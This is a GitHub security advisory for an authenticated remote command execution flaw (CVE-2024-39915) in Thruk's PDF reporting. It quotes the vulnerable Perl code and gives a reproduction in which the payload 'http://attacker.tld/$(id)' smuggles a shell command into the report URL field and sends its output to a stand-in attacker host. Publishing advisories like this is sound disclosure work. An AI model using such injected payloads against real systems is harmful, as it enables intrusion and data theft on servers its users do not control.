Skip to content

K-Thruk-2023-001 Authenticated RCE in Thruk 3.13

Critical
sni published GHSA-r7gx-h738-4w6f Jul 15, 2024

Package

No package listed

Affected versions

<=3.15

Patched versions

3.16

Description

Summary

Authenticated RCE in Thruk allows authorized users with network access to inject arbitrary commands via the URL parameter during PDF report generation.

Details

The Thruk web application does not properly process the url parameter when generating a PDF report. An authorized attacker with access to the reporting functionality could inject arbitrary commands that would be executed when the script /script/html2pdf.sh is called.
The vulnerability can be exploited by an authorized user with network access.

PoC

Steps to reproduce

Log in to the Thruk app
Open "Reports" > "Reporting" > "Create New Report"
Customize settings

Report Type - Report From Url
Direct PDF - Yes
Report from Url - http://attacker.tld/$(id)


Click "Regenerate Report" button

As a result, during the report generation process, the result of executing the id command will be sent to the attacker's website.
Screenshot at 19-16-16
Vulnerable code fragment

Thruk/plugins/plugins-available/reports2/lib/Thruk/Utils/Reports/Render.pm

Lines 385 to 396 in 4d01d50

my $url = $c->stash->{'param'}->{'url'};
# create fake session
my($sessionid) = Thruk::Utils::get_fake_session($c);
push @{$c->stash->{'report_tmp_files_to_delete'}}, $c->stash->{'fake_session_file'};
# directly convert external urls
if($url =~ m/^https?:\/\/([^\/]+)/mx && $c->stash->{'param'}->{'pdf'} && $c->stash->{'param'}->{'pdf'} eq 'yes') {
Thruk::Utils::External::update_status($ENV{'THRUK_JOB_DIR'}, 80, 'converting') if $ENV{'THRUK_JOB_DIR'};
my $cmd = $c->config->{home}.'/script/html2pdf.sh "'.$url.'" "'.$c->stash->{'attachment'}.'.pdf"';
local $ENV{THRUK_SESSION_ID} = $sessionid;
Thruk::Utils::IO::cmd($cmd); 

    my $url            = $c->stash->{'param'}->{'url'};
    [...]
    if($url =~ m/^https?:\/\/([^\/]+)/mx && $c->stash->{'param'}->{'pdf'} && $c->stash->{'param'}->{'pdf'} eq 'yes') {
        [...]
        my $cmd = $c->config->{home}.'/script/html2pdf.sh "'.$url.'" "'.$c->stash->{'attachment'}.'.pdf"';
        [...]
        Thruk::Utils::IO::cmd($cmd);

Remediation

In this specific case, it would suffice to escape a string so that it can be used as a shell argument. When using the escape function, it is important to take precautions to avoid the possibility of shell commands being injected.

Acknowledgements

The vulnerability was discovered by Sergey Bobrov (Kaspersky, https://kaspersky.com/)
https://github.com/BlackFan

Impact

Remote Code Execution

Severity

Critical

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CVE ID

CVE-2024-39915

Weaknesses